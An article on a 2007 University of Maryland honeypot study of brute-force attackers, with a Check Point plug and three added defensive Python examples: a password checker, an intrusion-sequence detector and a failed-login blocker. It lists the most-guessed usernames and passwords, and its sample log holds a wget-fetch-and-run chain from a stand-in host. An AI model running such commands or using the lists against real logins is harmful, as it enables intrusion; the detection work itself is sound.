Are hackers trying to get into your company’s computers right now? And what are they up to? A February 2007 study by the University of Maryland's A. James Clark School of Engineering is one of the first to quantify the least secure usernames and passwords that administrators use on their computers, the ones that give attackers the best chance of getting into corporate information resources.
The study, conducted by Michel Cukier, Clark School assistant professor of mechanical engineering, profiled the behavior of brute-force hackers, who use simple software-aided techniques to attack large numbers of computers indiscriminately. The researchers recorded which usernames and passwords the hackers tried most often and what they did once they gained access to a server.
On television and in film, these kinds of hackers have been portrayed as people with grudges who target specific institutions and manually try to break into their computers. But in reality, Cukier says, "Most of these attacks employ automated scripts that indiscriminately seek out thousands of computers at a time, looking for vulnerabilities."
"Our data provide quantifiable evidence that attacks are happening all the time to computers with Internet connections," Cukier says. "The computers in our study were attacked, on average, 2,244 times a day."
Cukier and two of his graduate students, Daniel Ramsbrock and Robin Berthier, set up weak security on four Linux computers with Internet access, then recorded what happened as the individual machines were attacked. They discovered the vast majority of attacks came from relatively unsophisticated hackers using "dictionary scripts," a type of software that runs through lists of common usernames and passwords attempting to break into computers.
Ten most targeted usernames
"Root" was the top username guessed by dictionary scripts, attempted 12 times more often than the second-place "admin." Successful root access hands the entire computer to the attacker, while an "admin" account typically carries lesser, though still administrative, privileges. Other top usernames in the scripts were "test," "guest," "info," "adm," "mysql," "user," "administrator," and "oracle." All should be avoided as usernames, Cukier says. (On Linux the root account itself cannot be removed, but remote logins to it can be refused with PermitRootLogin no in sshd_config, which takes the most-guessed account out of the scripts' reach.)
Bad password policy
The researchers found the most common password-guessing ploy was to reenter or try variations of the username. Some 43 percent of all password-guessing attempts simply reentered the username. The username followed by "123" was the second most-tried choice. Other common passwords attempted included "123456," "password," "1234," "12345," "passwd," "123," "test," and "1." These findings support the warnings of security experts that a password should never be identical or even related to its associated username, Cukier says.
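The two lists above, the most-targeted usernames and the most-guessed passwords, can be turned into a check that rejects exactly the credentials the dictionary scripts try. The Python below is an added example written for this page, not code from the study or its authors. The 12-character minimum and the letters-only comparison (so that "Admin_2007!" is caught as derived from "admin") are this example's own assumptions; the article says only "longer" and "upper and lowercase letters and numbers".

```python
import re

# Usernames the study found dictionary scripts try most often (from the article).
TOP_TARGETED_USERNAMES = {
    "root", "admin", "test", "guest", "info", "adm",
    "mysql", "user", "administrator", "oracle",
}

# Passwords the study found the scripts try most often (from the article).
TOP_GUESSED_PASSWORDS = {
    "123456", "password", "1234", "12345", "passwd", "123", "test", "1",
}

# Assumption for this example: the article says only "longer"; 12 is our floor.
MIN_LENGTH = 12


def _letters_only(s):
    """Lower-case and drop everything but letters, so 'Admin_2007!' compares as 'admin'."""
    return re.sub(r"[^a-z]", "", s.lower())


def password_problems(username, password):
    """Return the reasons a username/password pair would fall to the dictionary
    scripts described in the study; an empty list means it passes every check."""
    problems = []
    u, p = username.lower(), password.lower()

    if u in TOP_TARGETED_USERNAMES:
        problems.append("username is on the study's most-targeted list")
    if p in TOP_GUESSED_PASSWORDS:
        problems.append("password is on the study's most-guessed list")

    # 43% of guesses were the bare username; "<username>123" came next.
    if p == u:
        problems.append("password is identical to the username")
    elif u and p.startswith(u) and p[len(u):].isdigit():
        problems.append("password is the username followed by digits")
    elif u and (u in p or (_letters_only(username)
                           and _letters_only(password) == _letters_only(username))):
        problems.append("password contains or is derived from the username")

    # The article's advice: longer, with upper- and lowercase letters and digits.
    has_mix = (re.search(r"[a-z]", password) and re.search(r"[A-Z]", password)
               and re.search(r"\d", password))
    if len(password) < MIN_LENGTH or not has_mix:
        problems.append(f"shorter than {MIN_LENGTH} characters or lacking upper/lower/digit mix")
    return problems


if __name__ == "__main__":
    for user, pw in [("root", "root"), ("admin", "admin123"),
                     ("oracle", "Oracle2007!"), ("deploy_svc", "Tr0ub4dor-Correct-Horse")]:
        print(f"{user}/{pw}: {password_problems(user, pw) or 'ok'}")
```

Run it at account-creation time (a PAM pwquality-style hook or a provisioning script) rather than only at audit time; the point of the study is that these guesses arrive thousands of times a day, so a weak pair is exploitable from the moment it exists.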
What a hacker wants
Once hackers gain access to a computer, they swiftly act to determine whether it could be of use to them. During the study, the hackers' most common sequence of actions was to check the compromised computer's software configuration, change the password, check the hardware and/or software configuration again, download a file, install the downloaded program, and then run it.
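That observed sequence (reconnaissance, password change, download, install, execute) is concrete enough to look for in a command audit trail. The detector below is an added example written for this page, not tooling from the study; the log line format, the session identifiers and the regexes that sort commands into the five classes are this example's own assumptions, and the log itself is constructed. It groups commands per session and reports sessions in which the five classes appear in the order the study describes (the repeat configuration check is ignored, since it adds nothing to the match).

```python
import re
from collections import defaultdict

# Command classes in the order the study reports attackers using them.
# The regexes are this example's guesses at typical commands; tune them to your hosts.
CLASSES = [
    ("recon",      re.compile(r"^(uname|cat /proc/cpuinfo|cat /etc/issue|w|ps|ifconfig|cat /etc/passwd)\b")),
    ("credchange", re.compile(r"^passwd\b")),
    ("download",   re.compile(r"^(wget|curl|ftp|scp)\b")),
    ("install",    re.compile(r"^(tar|unzip|gunzip|chmod \+x|make)\b")),
    ("execute",    re.compile(r"^(\./|nohup |perl |python |sh )")),
]
REQUIRED = [name for name, _ in CLASSES]

# Assumed audit format: "<ISO timestamp> session=<id> uid=<user> cmd="<command line>"".
LINE_RE = re.compile(r'^(?P<ts>\S+) session=(?P<sid>\d+) uid=(?P<uid>\S+) cmd="(?P<cmd>[^"]*)"$')

# Constructed sample: one intrusion (8821), one admin session (8822) and one
# session that downloads and runs a file but never changes the password (8823).
SAMPLE_LOG = """
2007-02-12T03:14:07 session=8821 uid=root cmd="uname -a"
2007-02-12T03:14:09 session=8821 uid=root cmd="passwd"
2007-02-12T03:14:31 session=8821 uid=root cmd="cat /proc/cpuinfo"
2007-02-12T03:14:40 session=8821 uid=root cmd="wget http://203.0.113.5/x.tgz"
2007-02-12T03:14:52 session=8821 uid=root cmd="tar xzf x.tgz"
2007-02-12T03:14:55 session=8821 uid=root cmd="./x/run"
2007-02-12T08:02:11 session=8822 uid=alice cmd="uname -a"
2007-02-12T08:02:15 session=8822 uid=alice cmd="tail -f /var/log/syslog"
2007-02-12T08:05:02 session=8822 uid=alice cmd="exit"
2007-02-12T11:40:00 session=8823 uid=test cmd="wget http://203.0.113.5/x.tgz"
2007-02-12T11:40:05 session=8823 uid=test cmd="tar xzf x.tgz"
2007-02-12T11:40:07 session=8823 uid=test cmd="./x/run"
"""


def classify(cmd):
    """Map one command line to a class name, or None if it matches no class."""
    for name, rx in CLASSES:
        if rx.search(cmd):
            return name
    return None


def find_intrusion_sequences(log_text):
    """Return {session_id: [commands]} for sessions whose commands contain the
    study's five-step sequence as an ordered subsequence."""
    per_session = defaultdict(list)
    for line in log_text.strip().splitlines():
        m = LINE_RE.match(line)
        if m:
            per_session[m["sid"]].append(m["cmd"])

    hits = {}
    for sid, cmds in per_session.items():
        want, evidence = 0, []
        for cmd in cmds:
            # Advance only when the next required class shows up; extra commands are skipped.
            if want < len(REQUIRED) and classify(cmd) == REQUIRED[want]:
                evidence.append(cmd)
                want += 1
        if want == len(REQUIRED):
            hits[sid] = evidence
    return hits


if __name__ == "__main__":
    for sid, evidence in find_intrusion_sequences(SAMPLE_LOG).items():
        print(f"session {sid}: {' -> '.join(evidence)}")
```

Session 8823 is deliberately not reported: it skips the password change, so the strict chain does not match. In practice you would raise a lower-severity alert for partial chains (download followed by execute from a fresh login is worth a look on its own) and reserve the full chain for the highest severity.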
What are the hackers trying to accomplish? "The scripts return a list of most-likely-prospect computers to the hacker, who then attempts to access and compromise as many of them as possible," Cukier says. "Often they set up backdoors—undetected entrances into the computer that they control—so they can create botnets, for profit or disreputable purposes." A botnet is a collection of compromised computers that are controlled by autonomous software robots answering to a hacker who manipulates the computers remotely. Botnets can act to perpetrate fraud or identity theft, disrupt other networks, and damage computer files, among other things.
This study provides solid statistical evidence that supports widely held beliefs about username/password vulnerability and post-compromise attacking behavior. Computer administrators should avoid all of the usernames and passwords identified in the research and choose longer, more difficult and less obvious passwords with combinations of upper and lowercase letters and numbers that are not open to brute-force dictionary attacks.
In addition, the emerging profile of "script kiddy" hackers presented here can help security administrators in two main ways: in choosing security tools to combat the most common attacker actions and in performing more focused post-attack damage control and clean-up, according to Cukier.
Check Point approach
Among the security tools administrators can evaluate to combat brute-force attacks is Check Point Eventia Analyzer, which can cut short repeated brute-force attacks by raising an "event" after multiple failed username/password authentication attempts from the same source and reacting automatically to block the offending source IP. Check Point also provides real-time security updates to its security gateways for protection from brute-force, buffer-overflow, SQL-injection, and other attacks. These optional updates come via SmartDefense Services, which keep the defenses on Check Point security infrastructure current. To help you stay ahead of emerging threats and attacks, SmartDefense Services provide real-time updates and configuration advisories for defenses and security policies.
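The "event after N failures, then block the source" logic described above is simple enough to show end to end, and the same pass over the log yields the username tally the study collected. The Python below is an added example written for this page, not Check Point code and not tooling from the study. It reads the OpenSSH "Failed password" lines that sshd writes to auth.log; the threshold, the window and the sample log are this example's own (constructed) choices, and because syslog timestamps carry no year the year is supplied as a parameter.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# OpenSSH sshd failure line as written to auth.log (syslog prefix, no year).
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)

# Constructed sample: one dictionary script (198.51.100.23) and one user who
# mistypes her password twice and then gets in (203.0.113.77).
SAMPLE_AUTH_LOG = """
Feb 12 03:14:01 web1 sshd[2311]: Failed password for root from 198.51.100.23 port 40122 ssh2
Feb 12 03:14:03 web1 sshd[2313]: Failed password for root from 198.51.100.23 port 40130 ssh2
Feb 12 03:14:05 web1 sshd[2315]: Failed password for invalid user admin from 198.51.100.23 port 40141 ssh2
Feb 12 03:14:07 web1 sshd[2317]: Failed password for invalid user test from 198.51.100.23 port 40150 ssh2
Feb 12 03:14:09 web1 sshd[2319]: Failed password for root from 198.51.100.23 port 40162 ssh2
Feb 12 03:14:11 web1 sshd[2321]: Failed password for root from 198.51.100.23 port 40171 ssh2
Feb 12 09:30:44 web1 sshd[4102]: Failed password for alice from 203.0.113.77 port 51022 ssh2
Feb 12 09:31:10 web1 sshd[4104]: Failed password for alice from 203.0.113.77 port 51030 ssh2
Feb 12 09:31:40 web1 sshd[4106]: Accepted password for alice from 203.0.113.77 port 51038 ssh2
"""


def parse_failures(log_text, year=2007):
    """Yield (timestamp, username, source_ip) for every failed-password line."""
    for line in log_text.strip().splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue  # accepted logins and unrelated lines are ignored
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["user"], m["ip"]


def sources_to_block(log_text, threshold=5, window=timedelta(minutes=10)):
    """Return {ip: time the threshold was reached} for sources with at least
    `threshold` failures inside any sliding `window`: the 'event' that triggers a block."""
    recent = defaultdict(list)   # ip -> failure timestamps still inside the window
    blocked = {}
    for ts, _user, ip in parse_failures(log_text):
        if ip in blocked:
            continue             # already decided; later failures change nothing
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.pop(0)             # drop failures that have aged out of the window
        if len(q) >= threshold:
            blocked[ip] = ts
    return blocked


def top_usernames(log_text, n=5):
    """The study's own measurement: which usernames the scripts try most."""
    return Counter(user for _ts, user, _ip in parse_failures(log_text)).most_common(n)


if __name__ == "__main__":
    for ip, when in sources_to_block(SAMPLE_AUTH_LOG).items():
        print(f"block {ip} (threshold reached {when:%b %d %H:%M:%S})")
    print("most-tried usernames:", top_usernames(SAMPLE_AUTH_LOG))
```

The sliding window matters: a user who fumbles a password a few times over a morning should not trip the same rule as a script that tries five accounts in eight seconds. When wiring the block decision into a firewall, prefer a timed entry (an ipset with a timeout or a rule that expires) over a permanent deny, or a spoofed or shared-NAT source will eventually lock out legitimate users.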
Note: A summary of the study and a list of the top 1,000 usernames tried by hackers' dictionary scripts is available from the authors.